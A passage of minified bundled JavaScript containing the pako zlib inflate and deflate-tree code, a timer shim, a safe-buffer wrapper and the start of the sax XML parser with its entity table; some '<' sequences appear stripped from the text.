method",v.mode=w;break}if(J-=4,ze=8+(15&(R>>>=4)),0===v.wbits)v.wbits=ze;else if(ze>v.wbits){l.msg="invalid window size",v.mode=w;break}v.dmax=1<>8&1),512&v.flags&&(Qe[0]=255&R,Qe[1]=R>>>8&255,v.check=_(v.check,Qe,2,0)),R=0,J=0,v.mode=3;case 3:for(;J<32;){if(0===L)break e;L--,R+=M[G++]<>>8&255,Qe[2]=R>>>16&255,Qe[3]=R>>>24&255,v.check=_(v.check,Qe,4,0)),R=0,J=0,v.mode=4;case 4:for(;J<16;){if(0===L)break e;L--,R+=M[G++]<>8),512&v.flags&&(Qe[0]=255&R,Qe[1]=R>>>8&255,v.check=_(v.check,Qe,2,0)),R=0,J=0,v.mode=5;case 5:if(1024&v.flags){for(;J<16;){if(0===L)break e;L--,R+=M[G++]<>>8&255,v.check=_(v.check,Qe,2,0)),R=0,J=0}else v.head&&(v.head.extra=null);v.mode=6;case 6:if(1024&v.flags&&((Ie=v.length)>L&&(Ie=L),Ie&&(v.head&&(ze=v.head.extra_len-v.length,v.head.extra||(v.head.extra=new Array(v.head.extra_len)),C.arraySet(v.head.extra,M,G,Ie,ze)),512&v.flags&&(v.check=_(v.check,M,Ie,G)),L-=Ie,G+=Ie,v.length-=Ie),v.length))break e;v.length=0,v.mode=7;case 7:if(2048&v.flags){if(0===L)break e;Ie=0;do{ze=M[G+Ie++],v.head&&ze&&v.length<65536&&(v.head.name+=String.fromCharCode(ze))}while(ze&&Ie>9&1,v.head.done=!0),l.adler=v.check=0,v.mode=D;break;case 10:for(;J<32;){if(0===L)break e;L--,R+=M[G++]<>>=7&J,J-=7&J,v.mode=27;break}for(;J<3;){if(0===L)break e;L--,R+=M[G++]<>>=1)){case 0:v.mode=14;break;case 1:if(ye(v),v.mode=20,6===f){R>>>=2,J-=2;break e}break;case 2:v.mode=17;break;case 3:l.msg="invalid block type",v.mode=w}R>>>=2,J-=2;break;case 14:for(R>>>=7&J,J-=7&J;J<32;){if(0===L)break e;L--,R+=M[G++]<>>16^65535)){l.msg="invalid stored block lengths",v.mode=w;break}if(v.length=65535&R,R=0,J=0,v.mode=15,6===f)break e;case 15:v.mode=16;case 16:if(Ie=v.length){if(Ie>L&&(Ie=L),Ie>h&&(Ie=h),0===Ie)break e;C.arraySet(P,M,G,Ie,X),L-=Ie,G+=Ie,h-=Ie,X+=Ie,v.length-=Ie;break}v.mode=D;break;case 17:for(;J<14;){if(0===L)break e;L--,R+=M[G++]<>>=5)),J-=5,v.ncode=4+(15&(R>>>=5)),R>>>=4,J-=4,v.nlen>286||v.ndist>30){l.msg="too many length or distance symbols",v.mode=w;break}v.have=0,v.mode=18;case 18:for(;v.have>>=3,J-=3}for(;v.have<19;)v.lens[ht[v.have++]]=0;if(v.lencode=v.lendyn,v.lenbits=7,me=A(0,v.lens,0,19,v.lencode,0,v.work,Ke={bits:v.lenbits}),v.lenbits=Ke.bits,me){l.msg="invalid code lengths set",v.mode=w;break}v.have=0,v.mode=19;case 19:for(;v.have>>16&255,Be=65535&Ge,!((Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=M[G++]<>>=Xe,J-=Xe,v.lens[v.have++]=Be;else{if(16===Be){for(rt=Xe+2;J>>=Xe,J-=Xe,0===v.have){l.msg="invalid bit length repeat",v.mode=w;break}ze=v.lens[v.have-1],Ie=3+(3&R),R>>>=2,J-=2}else if(17===Be){for(rt=Xe+3;J>>=Xe)),R>>>=3,J-=3}else{for(rt=Xe+7;J>>=Xe)),R>>>=7,J-=7}if(v.have+Ie>v.nlen+v.ndist){l.msg="invalid bit length repeat",v.mode=w;break}for(;Ie--;)v.lens[v.have++]=ze}}if(v.mode===w)break;if(0===v.lens[256]){l.msg="invalid code -- missing end-of-block",v.mode=w;break}if(v.lenbits=9,me=A(1,v.lens,0,v.nlen,v.lencode,0,v.work,Ke={bits:v.lenbits}),v.lenbits=Ke.bits,me){l.msg="invalid literal/lengths set",v.mode=w;break}if(v.distbits=6,v.distcode=v.distdyn,me=A(2,v.lens,v.nlen,v.ndist,v.distcode,0,v.work,Ke={bits:v.distbits}),v.distbits=Ke.bits,me){l.msg="invalid distances set",v.mode=w;break}if(v.mode=20,6===f)break e;case 20:v.mode=21;case 21:if(L>=6&&h>=258){l.next_out=X,l.avail_out=h,l.next_in=G,l.avail_in=L,v.hold=R,v.bits=J,y(l,ue),X=l.next_out,P=l.output,h=l.avail_out,G=l.next_in,M=l.input,L=l.avail_in,R=v.hold,J=v.bits,v.mode===D&&(v.back=-1);break}for(v.back=0;He=(Ge=v.lencode[R&(1<>>16&255,Be=65535&Ge,!((Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=M[G++]<>qe)])>>>16&255,Be=65535&Ge,!(qe+(Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=M[G++]<>>=qe,J-=qe,v.back+=qe}if(R>>>=Xe,J-=Xe,v.back+=Xe,v.length=Be,0===He){v.mode=26;break}if(32&He){v.back=-1,v.mode=D;break}if(64&He){l.msg="invalid literal/length code",v.mode=w;break}v.extra=15&He,v.mode=22;case 22:if(v.extra){for(rt=v.extra;J>>=v.extra,J-=v.extra,v.back+=v.extra}v.was=v.length,v.mode=23;case 23:for(;He=(Ge=v.distcode[R&(1<>>16&255,Be=65535&Ge,!((Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=M[G++]<>qe)])>>>16&255,Be=65535&Ge,!(qe+(Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=M[G++]<>>=qe,J-=qe,v.back+=qe}if(R>>>=Xe,J-=Xe,v.back+=Xe,64&He){l.msg="invalid distance code",v.mode=w;break}v.offset=Be,v.extra=15&He,v.mode=24;case 24:if(v.extra){for(rt=v.extra;J>>=v.extra,J-=v.extra,v.back+=v.extra}if(v.offset>v.dmax){l.msg="invalid distance too far back",v.mode=w;break}v.mode=25;case 25:if(0===h)break e;if(v.offset>(Ie=ue-h)){if((Ie=v.offset-Ie)>v.whave&&v.sane){l.msg="invalid distance too far back",v.mode=w;break}Ae=Ie>v.wnext?v.wsize-(Ie-=v.wnext):v.wnext-Ie,Ie>v.length&&(Ie=v.length),Ue=v.window}else Ue=P,Ae=X-v.offset,Ie=v.length;Ie>h&&(Ie=h),h-=Ie,v.length-=Ie;do{P[X++]=Ue[Ae++]}while(--Ie);0===v.length&&(v.mode=21);break;case 26:if(0===h)break e;P[X++]=v.length,h--,v.mode=21;break;case 27:if(v.wrap){for(;J<32;){if(0===L)break e;L--,R|=M[G++]<{"use strict";var C=E(4236),b=[3,4,5,6,7,8,9,10,11,13,15,17,19,23,27,31,35,43,51,59,67,83,99,115,131,163,195,227,258,0,0],_=[16,16,16,16,16,16,16,16,17,17,17,17,18,18,18,18,19,19,19,19,20,20,20,20,21,21,21,21,16,72,78],y=[1,2,3,4,5,7,9,13,17,25,33,49,65,97,129,193,257,385,513,769,1025,1537,2049,3073,4097,6145,8193,12289,16385,24577,0,0],A=[16,16,16,16,17,17,18,18,19,19,20,20,21,21,22,22,23,23,24,24,25,25,26,26,27,27,28,28,29,29,64,64];$.exports=function(p,D,w,x,S,O,B,K){var ee,se,ve,le,ye,z,l,f,v,M=K.bits,P=0,G=0,X=0,L=0,h=0,R=0,J=0,Z=0,ue=0,Ie=0,Ae=null,Ue=0,Xe=new C.Buf16(16),He=new C.Buf16(16),Be=null,qe=0;for(P=0;P<=15;P++)Xe[P]=0;for(G=0;G=1&&0===Xe[L];L--);if(h>L&&(h=L),0===L)return S[O++]=20971520,S[O++]=20971520,K.bits=1,0;for(X=1;X0&&(0===p||1!==L))return-1;for(He[1]=0,P=1;P<15;P++)He[P+1]=He[P]+Xe[P];for(G=0;G852||2===p&&ue>592)return 1;for(;;){l=P-J,B[G]z?(f=Be[qe+B[G]],v=Ae[Ue+B[G]]):(f=96,v=0),ee=1<>J)+(se-=ee)]=l<<24|f<<16|v|0}while(0!==se);for(ee=1<>=1;if(0!==ee?(Ie&=ee-1,Ie+=ee):Ie=0,G++,0==--Xe[P]){if(P===L)break;P=D[w+B[G]]}if(P>h&&(Ie&le)!==ve){for(0===J&&(J=h),ye+=X,Z=1<<(R=P-J);R+J852||2===p&&ue>592)return 1;S[ve=Ie&le]=h<<24|R<<16|ye-O|0}}return 0!==Ie&&(S[ye+Ie]=4194304|P-J<<24),K.bits=h,0}},8898:$=>{"use strict";$.exports={2:"need dictionary",1:"stream end",0:"","-1":"file error","-2":"stream error","-3":"data error","-4":"insufficient memory","-5":"buffer error","-6":"incompatible version"}},342:($,U,E)=>{"use strict";var C=E(4236);function b(Ae){for(var Ue=Ae.length;--Ue>=0;)Ae[Ue]=0}var _=[0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0],y=[0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13],A=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7],p=[16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15],D=new Array(576);b(D);var w=new Array(60);b(w);var x=new Array(512);b(x);var S=new Array(256);b(S);var O=new Array(29);b(O);var B,K,ee,se=new Array(30);function ve(Ae,Ue,Xe,He,Be){this.static_tree=Ae,this.extra_bits=Ue,this.extra_base=Xe,this.elems=He,this.max_length=Be,this.has_stree=Ae&&Ae.length}function le(Ae,Ue){this.dyn_tree=Ae,this.max_code=0,this.stat_desc=Ue}function ye(Ae){return Ae<256?x[Ae]:x[256+(Ae>>>7)]}function z(Ae,Ue){Ae.pending_buf[Ae.pending++]=255&Ue,Ae.pending_buf[Ae.pending++]=Ue>>>8&255}function l(Ae,Ue,Xe){Ae.bi_valid>16-Xe?(Ae.bi_buf|=Ue<>16-Ae.bi_valid,Ae.bi_valid+=Xe-16):(Ae.bi_buf|=Ue<>>=1,Xe<<=1}while(--Ue>0);return Xe>>>1}function M(Ae,Ue,Xe){var He,Be,qe=new Array(16),De=0;for(He=1;He<=15;He++)qe[He]=De=De+Xe[He-1]<<1;for(Be=0;Be<=Ue;Be++){var Ve=Ae[2*Be+1];0!==Ve&&(Ae[2*Be]=v(qe[Ve]++,Ve))}}function P(Ae){var Ue;for(Ue=0;Ue<286;Ue++)Ae.dyn_ltree[2*Ue]=0;for(Ue=0;Ue<30;Ue++)Ae.dyn_dtree[2*Ue]=0;for(Ue=0;Ue<19;Ue++)Ae.bl_tree[2*Ue]=0;Ae.dyn_ltree[512]=1,Ae.opt_len=Ae.static_len=0,Ae.last_lit=Ae.matches=0}function G(Ae){Ae.bi_valid>8?z(Ae,Ae.bi_buf):Ae.bi_valid>0&&(Ae.pending_buf[Ae.pending++]=Ae.bi_buf),Ae.bi_buf=0,Ae.bi_valid=0}function X(Ae,Ue,Xe,He){var Be=2*Ue,qe=2*Xe;return Ae[Be]>1;Xe>=1;Xe--)L(Ae,qe,Xe);Be=ze;do{Xe=Ae.heap[1],Ae.heap[1]=Ae.heap[Ae.heap_len--],L(Ae,qe,1),He=Ae.heap[1],Ae.heap[--Ae.heap_max]=Xe,Ae.heap[--Ae.heap_max]=He,qe[2*Be]=qe[2*Xe]+qe[2*He],Ae.depth[Be]=(Ae.depth[Xe]>=Ae.depth[He]?Ae.depth[Xe]:Ae.depth[He])+1,qe[2*Xe+1]=qe[2*He+1]=Be,Ae.heap[1]=Be++,L(Ae,qe,1)}while(Ae.heap_len>=2);Ae.heap[--Ae.heap_max]=Ae.heap[1],function(Ke,rt){var Ge,Qe,ht,mt,lt,ft,xe=rt.dyn_tree,We=rt.max_code,Je=rt.stat_desc.static_tree,Oe=rt.stat_desc.has_stree,Te=rt.stat_desc.extra_bits,Le=rt.stat_desc.extra_base,$e=rt.stat_desc.max_length,st=0;for(mt=0;mt<=15;mt++)Ke.bl_count[mt]=0;for(xe[2*Ke.heap[Ke.heap_max]+1]=0,Ge=Ke.heap_max+1;Ge<573;Ge++)(mt=xe[2*xe[2*(Qe=Ke.heap[Ge])+1]+1]+1)>$e&&(mt=$e,st++),xe[2*Qe+1]=mt,Qe>We||(Ke.bl_count[mt]++,lt=0,Qe>=Le&&(lt=Te[Qe-Le]),Ke.opt_len+=(ft=xe[2*Qe])*(mt+lt),Oe&&(Ke.static_len+=ft*(Je[2*Qe+1]+lt)));if(0!==st){do{for(mt=$e-1;0===Ke.bl_count[mt];)mt--;Ke.bl_count[mt]--,Ke.bl_count[mt+1]+=2,Ke.bl_count[$e]--,st-=2}while(st>0);for(mt=$e;0!==mt;mt--)for(Qe=Ke.bl_count[mt];0!==Qe;)(ht=Ke.heap[--Ge])>We||(xe[2*ht+1]!==mt&&(Ke.opt_len+=(mt-xe[2*ht+1])*xe[2*ht],xe[2*ht+1]=mt),Qe--)}}(Ae,Ue),M(qe,me,Ae.bl_count)}function J(Ae,Ue,Xe){var He,Be,qe=-1,De=Ue[1],Ve=0,ze=7,me=4;for(0===De&&(ze=138,me=3),Ue[2*(Xe+1)+1]=65535,He=0;He<=Xe;He++)Be=De,De=Ue[2*(He+1)+1],++Ve>=7;Be<30;Be++)for(se[Be]=qe<<7,Ue=0;Ue<1<0?(2===Ae.strm.data_type&&(Ae.strm.data_type=function(Ve){var ze,me=4093624447;for(ze=0;ze<=31;ze++,me>>>=1)if(1&me&&0!==Ve.dyn_ltree[2*ze])return 0;if(0!==Ve.dyn_ltree[18]||0!==Ve.dyn_ltree[20]||0!==Ve.dyn_ltree[26])return 1;for(ze=32;ze<256;ze++)if(0!==Ve.dyn_ltree[2*ze])return 1;return 0}(Ae)),R(Ae,Ae.l_desc),R(Ae,Ae.d_desc),De=function(Ve){var ze;for(J(Ve,Ve.dyn_ltree,Ve.l_desc.max_code),J(Ve,Ve.dyn_dtree,Ve.d_desc.max_code),R(Ve,Ve.bl_desc),ze=18;ze>=3&&0===Ve.bl_tree[2*p[ze]+1];ze--);return Ve.opt_len+=3*(ze+1)+5+5+4,ze}(Ae),(qe=Ae.static_len+3+7>>>3)<=(Be=Ae.opt_len+3+7>>>3)&&(Be=qe)):Be=qe=Xe+5,Xe+4<=Be&&-1!==Ue?Ie(Ae,Ue,Xe,He):4===Ae.strategy||qe===Be?(l(Ae,2+(He?1:0),3),h(Ae,D,w)):(l(Ae,4+(He?1:0),3),function(Ve,ze,me,Ke){var rt;for(l(Ve,ze-257,5),l(Ve,me-1,5),l(Ve,Ke-4,4),rt=0;rt>>8&255,Ae.pending_buf[Ae.d_buf+2*Ae.last_lit+1]=255&Ue,Ae.pending_buf[Ae.l_buf+Ae.last_lit]=255&Xe,Ae.last_lit++,0===Ue?Ae.dyn_ltree[2*Xe]++:(Ae.matches++,Ue--,Ae.dyn_ltree[2*(S[Xe]+256+1)]++,Ae.dyn_dtree[2*ye(Ue)]++),Ae.last_lit===Ae.lit_bufsize-1},U._tr_align=function(Ae){var Ue;l(Ae,2,3),f(Ae,256,D),16===(Ue=Ae).bi_valid?(z(Ue,Ue.bi_buf),Ue.bi_buf=0,Ue.bi_valid=0):Ue.bi_valid>=8&&(Ue.pending_buf[Ue.pending++]=255&Ue.bi_buf,Ue.bi_buf>>=8,Ue.bi_valid-=8)}},2292:$=>{"use strict";$.exports=function(){this.input=null,this.next_in=0,this.avail_in=0,this.total_in=0,this.output=null,this.next_out=0,this.avail_out=0,this.total_out=0,this.msg="",this.state=null,this.data_type=2,this.adler=0}},4155:$=>{var U,E,C=$.exports={};function b(){throw new Error("setTimeout has not been defined")}function _(){throw new Error("clearTimeout has not been defined")}function y(K){if(U===setTimeout)return setTimeout(K,0);if((U===b||!U)&&setTimeout)return U=setTimeout,setTimeout(K,0);try{return U(K,0)}catch(ee){try{return U.call(null,K,0)}catch(se){return U.call(this,K,0)}}}!function(){try{U="function"==typeof setTimeout?setTimeout:b}catch(K){U=b}try{E="function"==typeof clearTimeout?clearTimeout:_}catch(K){E=_}}();var A,p=[],D=!1,w=-1;function x(){D&&A&&(D=!1,A.length?p=A.concat(p):w=-1,p.length&&S())}function S(){if(!D){var K=y(x);D=!0;for(var ee=p.length;ee;){for(A=p,p=[];++w1)for(var se=1;se{var C=E(8764),b=C.Buffer;function _(A,p){for(var D in A)p[D]=A[D]}function y(A,p,D){return b(A,p,D)}b.from&&b.alloc&&b.allocUnsafe&&b.allocUnsafeSlow?$.exports=C:(_(C,U),U.Buffer=y),_(b,y),y.from=function(A,p,D){if("number"==typeof A)throw new TypeError("Argument must not be a number");return b(A,p,D)},y.alloc=function(A,p,D){if("number"!=typeof A)throw new TypeError("Argument must be a number");var w=b(A);return void 0!==p?"string"==typeof D?w.fill(p,D):w.fill(p):w.fill(0),w},y.allocUnsafe=function(A){if("number"!=typeof A)throw new TypeError("Argument must be a number");return b(A)},y.allocUnsafeSlow=function(A){if("number"!=typeof A)throw new TypeError("Argument must be a number");return C.SlowBuffer(A)}},6099:($,U,E)=>{!function(C){C.parser=function(qe,De){return new y(qe,De)},C.SAXParser=y,C.SAXStream=p,C.createStream=function(qe,De){return new p(qe,De)},C.MAX_BUFFER_LENGTH=65536;var b,_=["comment","sgmlDecl","textNode","tagName","doctype","procInstName","procInstBody","entity","attribName","attribValue","cdata","script"];function y(qe,De){if(!(this instanceof y))return new y(qe,De);var Ve=this;(function(ze){for(var me=0,Ke=_.length;me"===ze?(G(De,"onsgmldeclaration",De.sgmlDecl),De.sgmlDecl="",De.state=v.TEXT):(se(ze)&&(De.state=v.SGML_DECL_QUOTED),De.sgmlDecl+=ze);continue;case v.SGML_DECL_QUOTED:ze===De.q&&(De.state=v.SGML_DECL,De.q=""),De.sgmlDecl+=ze;continue;case v.DOCTYPE:">"===ze?(De.state=v.TEXT,G(De,"ondoctype",De.doctype),De.doctype=!0):(De.doctype+=ze,"["===ze?De.state=v.DOCTYPE_DTD:se(ze)&&(De.state=v.DOCTYPE_QUOTED,De.q=ze));continue;case v.DOCTYPE_QUOTED:De.doctype+=ze,ze===De.q&&(De.q="",De.state=v.DOCTYPE);continue;case v.DOCTYPE_DTD:De.doctype+=ze,"]"===ze?De.state=v.DOCTYPE:se(ze)&&(De.state=v.DOCTYPE_DTD_QUOTED,De.q=ze);continue;case v.DOCTYPE_DTD_QUOTED:De.doctype+=ze,ze===De.q&&(De.state=v.DOCTYPE_DTD,De.q="");continue;case v.COMMENT:"-"===ze?De.state=v.COMMENT_ENDING:De.comment+=ze;continue;case v.COMMENT_ENDING:"-"===ze?(De.state=v.COMMENT_ENDED,De.comment=L(De.opt,De.comment),De.comment&&G(De,"oncomment",De.comment),De.comment=""):(De.comment+="-"+ze,De.state=v.COMMENT);continue;case v.COMMENT_ENDED:">"!==ze?(J(De,"Malformed comment"),De.comment+="--"+ze,De.state=v.COMMENT):De.state=v.TEXT;continue;case v.CDATA:"]"===ze?De.state=v.CDATA_ENDING:De.cdata+=ze;continue;case v.CDATA_ENDING:"]"===ze?De.state=v.CDATA_ENDING_2:(De.cdata+="]"+ze,De.state=v.CDATA);continue;case v.CDATA_ENDING_2:">"===ze?(De.cdata&&G(De,"oncdata",De.cdata),G(De,"onclosecdata"),De.cdata="",De.state=v.TEXT):"]"===ze?De.cdata+="]":(De.cdata+="]]"+ze,De.state=v.CDATA);continue;case v.PROC_INST:"?"===ze?De.state=v.PROC_INST_ENDING:ee(ze)?De.state=v.PROC_INST_BODY:De.procInstName+=ze;continue;case v.PROC_INST_BODY:if(!De.procInstBody&&ee(ze))continue;"?"===ze?De.state=v.PROC_INST_ENDING:De.procInstBody+=ze;continue;case v.PROC_INST_ENDING:">"===ze?(G(De,"onprocessinginstruction",{name:De.procInstName,body:De.procInstBody}),De.procInstName=De.procInstBody="",De.state=v.TEXT):(De.procInstBody+="?"+ze,De.state=v.PROC_INST_BODY);continue;case v.OPEN_TAG:le(O,ze)?De.tagName+=ze:(Z(De),">"===ze?Ae(De):"/"===ze?De.state=v.OPEN_TAG_SLASH:(ee(ze)||J(De,"Invalid character in tag name"),De.state=v.ATTRIB));continue;case v.OPEN_TAG_SLASH:">"===ze?(Ae(De,!0),Ue(De)):(J(De,"Forward-slash in opening tag not followed by >"),De.state=v.ATTRIB);continue;case v.ATTRIB:if(ee(ze))continue;">"===ze?Ae(De):"/"===ze?De.state=v.OPEN_TAG_SLASH:le(S,ze)?(De.attribName=ze,De.attribValue="",De.state=v.ATTRIB_NAME):J(De,"Invalid attribute name");continue;case v.ATTRIB_NAME:"="===ze?De.state=v.ATTRIB_VALUE:">"===ze?(J(De,"Attribute without value"),De.attribValue=De.attribName,Ie(De),Ae(De)):ee(ze)?De.state=v.ATTRIB_NAME_SAW_WHITE:le(O,ze)?De.attribName+=ze:J(De,"Invalid attribute name");continue;case v.ATTRIB_NAME_SAW_WHITE:if("="===ze)De.state=v.ATTRIB_VALUE;else{if(ee(ze))continue;J(De,"Attribute without value"),De.tag.attributes[De.attribName]="",De.attribValue="",G(De,"onattribute",{name:De.attribName,value:""}),De.attribName="",">"===ze?Ae(De):le(S,ze)?(De.attribName=ze,De.state=v.ATTRIB_NAME):(J(De,"Invalid attribute name"),De.state=v.ATTRIB)}continue;case v.ATTRIB_VALUE:if(ee(ze))continue;se(ze)?(De.q=ze,De.state=v.ATTRIB_VALUE_QUOTED):(J(De,"Unquoted attribute value"),De.state=v.ATTRIB_VALUE_UNQUOTED,De.attribValue=ze);continue;case v.ATTRIB_VALUE_QUOTED:if(ze!==De.q){"&"===ze?De.state=v.ATTRIB_VALUE_ENTITY_Q:De.attribValue+=ze;continue}Ie(De),De.q="",De.state=v.ATTRIB_VALUE_CLOSED;continue;case v.ATTRIB_VALUE_CLOSED:ee(ze)?De.state=v.ATTRIB:">"===ze?Ae(De):"/"===ze?De.state=v.OPEN_TAG_SLASH:le(S,ze)?(J(De,"No whitespace between attributes"),De.attribName=ze,De.attribValue="",De.state=v.ATTRIB_NAME):J(De,"Invalid attribute name");continue;case v.ATTRIB_VALUE_UNQUOTED:if(!ve(ze)){"&"===ze?De.state=v.ATTRIB_VALUE_ENTITY_U:De.attribValue+=ze;continue}Ie(De),">"===ze?Ae(De):De.state=v.ATTRIB;continue;case v.CLOSE_TAG:if(De.tagName)">"===ze?Ue(De):le(O,ze)?De.tagName+=ze:De.script?(De.script+=""===ze?Ue(De):J(De,"Invalid characters in closing tag");continue;case v.TEXT_ENTITY:case v.ATTRIB_VALUE_ENTITY_Q:case v.ATTRIB_VALUE_ENTITY_U:var rt,Ge;switch(De.state){case v.TEXT_ENTITY:rt=v.TEXT,Ge="textNode";break;case v.ATTRIB_VALUE_ENTITY_Q:rt=v.ATTRIB_VALUE_QUOTED,Ge="attribValue";break;case v.ATTRIB_VALUE_ENTITY_U:rt=v.ATTRIB_VALUE_UNQUOTED,Ge="attribValue"}";"===ze?(De[Ge]+=Xe(De),De.entity="",De.state=rt):le(De.entity.length?K:B,ze)?De.entity+=ze:(J(De,"Invalid character in entity name"),De[Ge]+="&"+De.entity+ze,De.entity="",De.state=rt);continue;default:throw new Error(De,"Unknown state: "+De.state)}return De.position>=De.bufferCheckPosition&&function(Qe){for(var ht=Math.max(C.MAX_BUFFER_LENGTH,10),mt=0,lt=0,ft=_.length;ltht)switch(_[lt]){case"textNode":X(Qe);break;case"cdata":G(Qe,"oncdata",Qe.cdata),Qe.cdata="";break;case"script":G(Qe,"onscript",Qe.script),Qe.script="";break;default:h(Qe,"Max buffer length exceeded: "+_[lt])}mt=Math.max(mt,xe)}Qe.bufferCheckPosition=C.MAX_BUFFER_LENGTH-mt+Qe.position}(De),De},resume:function(){return this.error=null,this},close:function(){return this.write(null)},flush:function(){var qe;X(qe=this),""!==qe.cdata&&(G(qe,"oncdata",qe.cdata),qe.cdata=""),""!==qe.script&&(G(qe,"onscript",qe.script),qe.script="")}};try{b=E(2830).Stream}catch(qe){b=function(){}}var A=C.EVENTS.filter(function(qe){return"error"!==qe&&"end"!==qe});function p(qe,De){if(!(this instanceof p))return new p(qe,De);b.apply(this),this._parser=new y(qe,De),this.writable=!0,this.readable=!0;var Ve=this;this._parser.onend=function(){Ve.emit("end")},this._parser.onerror=function(ze){Ve.emit("error",ze),Ve._parser.error=null},this._decoder=null,A.forEach(function(ze){Object.defineProperty(Ve,"on"+ze,{get:function(){return Ve._parser["on"+ze]},set:function(me){if(!me)return Ve.removeAllListeners(ze),Ve._parser["on"+ze]=me,me;Ve.on(ze,me)},enumerable:!0,configurable:!1})})}(p.prototype=Object.create(b.prototype,{constructor:{value:p}})).write=function(qe){if("function"==typeof ie&&"function"==typeof ie.isBuffer&&ie.isBuffer(qe)){if(!this._decoder){var De=E(2553).s;this._decoder=new De("utf8")}qe=this._decoder.write(qe)}return this._parser.write(qe.toString()),this.emit("data",qe),!0},p.prototype.end=function(qe){return qe&&qe.length&&this.write(qe),this._parser.end(),!0},p.prototype.on=function(qe,De){var Ve=this;return Ve._parser["on"+qe]||-1===A.indexOf(qe)||(Ve._parser["on"+qe]=function(){var ze=1===arguments.length?[arguments[0]]:Array.apply(null,arguments);ze.splice(0,0,qe),Ve.emit.apply(Ve,ze)}),b.prototype.on.call(Ve,qe,De)};var D="http://www.w3.org/XML/1998/namespace",w="http://www.w3.org/2000/xmlns/",x={xml:D,xmlns:w},S=/[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]/,O=/[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u00B7\u0300-\u036F\u203F-\u2040.\d-]/,B=/[#:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]/,K=/[#:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u00B7\u0300-\u036F\u203F-\u2040.\d-]/;function ee(qe){return" "===qe||"\n"===qe||"\r"===qe||"\t"===qe}function se(qe){return'"'===qe||"'"===qe}function ve(qe){return">"===qe||ee(qe)}function le(qe,De){return qe.test(De)}function ye(qe,De){return!le(qe,De)}var z,l,f,v=0;for(var M in C.STATE={BEGIN:v++,BEGIN_WHITESPACE:v++,TEXT:v++,TEXT_ENTITY:v++,OPEN_WAKA:v++,SGML_DECL:v++,SGML_DECL_QUOTED:v++,DOCTYPE:v++,DOCTYPE_QUOTED:v++,DOCTYPE_DTD:v++,DOCTYPE_DTD_QUOTED:v++,COMMENT_STARTING:v++,COMMENT:v++,COMMENT_ENDING:v++,COMMENT_ENDED:v++,CDATA:v++,CDATA_ENDING:v++,CDATA_ENDING_2:v++,PROC_INST:v++,PROC_INST_BODY:v++,PROC_INST_ENDING:v++,OPEN_TAG:v++,OPEN_TAG_SLASH:v++,ATTRIB:v++,ATTRIB_NAME:v++,ATTRIB_NAME_SAW_WHITE:v++,ATTRIB_VALUE:v++,ATTRIB_VALUE_QUOTED:v++,ATTRIB_VALUE_CLOSED:v++,ATTRIB_VALUE_UNQUOTED:v++,ATTRIB_VALUE_ENTITY_Q:v++,ATTRIB_VALUE_ENTITY_U:v++,CLOSE_TAG:v++,CLOSE_TAG_SAW_WHITE:v++,SCRIPT:v++,SCRIPT_ENDING:v++},C.XML_ENTITIES={amp:"&",gt:">",lt:"<",quot:'"',apos:"'"},C.ENTITIES={amp:"&",gt:">",lt:"<",quot:'"',apos:"'",AElig:198,Aacute:193,Acirc:194,Agrave:192,Aring:197,Atilde:195,Auml:196,Ccedil:199,ETH:208,Eacute:201,Ecirc:202,Egrave:200,Euml:203,Iacute:205,Icirc:206,Igrave:204,Iuml:207,Ntilde:209,Oacute:211,Ocirc:212,Ograve:210,Oslash:216,Otilde:213,Ouml:214,THORN:222,Uacute:218,Ucirc:219,Ugrave:217,Uuml:220,Yacute:221,aacute:225,acirc:226,aelig:230,agrave:224,aring:229,atilde:227,auml:228,ccedil:231,eacute:233,ecirc:234,egrave:232,eth:240,euml:235,iacute:237,icirc:238,igrave:236,iuml:239,ntilde:241,oacute:243,ocirc:244,ograve:242,oslash:248,otilde:245,ouml:246,szlig:223,thorn:254,uacute:250,ucirc:251,ugrave:249,uuml:252,yacute:253,yuml:255,copy:169,reg:174,nbsp:160,iexcl:161,cent:162,pound:163,curren:164,yen:165,brvbar:166,sect:167,uml:168,ordf:170,laquo:171,not:172,shy:173,macr:175,deg:176,plusmn:177,sup1:185,sup2:178,sup3:179,acute:180,micro:181,para:182,middot:183,cedil:184,ordm:186,raquo:187,frac14:188,frac12:189,frac34:190,iquest:191,times:215,divide:247,OElig:338,oelig:339,Scaron:352,scaron:353,Yuml:376,fnof:402,circ:710,tilde:732,Alpha:913,Beta:914,Gamma:915,Delta:916,Epsilon:917,Zeta:918,Eta:919,Theta:920,Iota:921,Kappa:922,Lambda:923,Mu:924,Nu:925,Xi:926,Omicron:927,Pi:928,Rho:929,Sigma:931,Tau:932,Upsilon:933,Phi:934,Chi:935,Psi:936,Omega:937,alpha:945,beta:946,gamma:947,delta:948,epsilon:949,zeta:950,eta:951,theta:952,iota:953,kappa:954,lambda:955,mu:956,nu:957,xi:958,omicron:959,pi:960,rho:961,sigmaf:962,sigma:963,tau:964,upsilon:965,phi:966,chi:967,psi:968,omega:969,thetasym:977,upsih:978,piv:982,ensp:8194